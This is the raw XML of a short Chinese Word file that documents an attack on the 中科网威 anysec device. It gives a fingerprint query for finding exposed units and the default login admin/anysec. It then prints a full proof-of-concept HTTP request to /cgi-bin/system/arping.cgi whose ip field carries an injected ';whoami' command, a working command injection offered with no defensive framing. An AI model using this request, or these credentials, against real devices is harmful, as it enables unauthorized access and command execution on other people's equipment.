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645DF8"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资产测绘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7E561F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app="中科网威-anysec"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047AB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先用弱口令admin/anysec登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EEEAB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C945074"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POC：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2980A4D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0B752E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 /cgi-bin/system/arping.cgi HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6637D6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Host: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB2CF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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C139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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A3B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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5339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Accept-Encoding: gzip, deflate, br, zstd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C8BC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Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA61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Content-Length: 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD9F9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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B3D6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Cookie: CGISID=2ZuEDPfh3Yxu6hyiAmyZpxIHymc9vSfxGJbcqhtl8RP51; sdmenu_my_menu=100000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210068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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0BDF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Sec-Fetch-Dest: frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB9E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Sec-Fetch-Mode: navigate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC51B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Sec-Fetch-Site: same-origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AED60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Sec-Fetch-User: ?1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C8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Priority: u=4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B52BCD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378524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moduleid=150&amp;tasknum=1&amp;ip=127.0.0.1;whoami&amp;interface=wan0&amp;count=4&amp;sip=8.8.8.8&amp;x=58&amp;y=16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1BD33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4853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8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5E72"/>
    <w:rsid w:val="0EBE6BB4"/>
    <w:rsid w:val="10F92125"/>
    <w:rsid w:val="1C901B90"/>
    <w:rsid w:val="1E2D1660"/>
    <w:rsid w:val="2A45760F"/>
    <w:rsid w:val="315C608D"/>
    <w:rsid w:val="36484E32"/>
    <w:rsid w:val="36857E34"/>
    <w:rsid w:val="3845787B"/>
    <w:rsid w:val="39DC5FBD"/>
    <w:rsid w:val="3BD80A06"/>
    <w:rsid w:val="46E44703"/>
    <w:rsid w:val="491F7C74"/>
    <w:rsid w:val="4A7C00D7"/>
    <w:rsid w:val="5160707C"/>
    <w:rsid w:val="55855303"/>
    <w:rsid w:val="6106379C"/>
    <w:rsid w:val="70DC0075"/>
    <w:rsid w:val="71B7463E"/>
    <w:rsid w:val="73D2575F"/>
    <w:rsid w:val="7836450F"/>
    <w:rsid w:val="7994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735</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>65</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>765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2024-12-20T08:13:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>默</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-20T09:47:48Z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EFA171C99CD8443E81746BD856590E4F_12</vt:lpwstr>
  </property>
</Properties>
</file>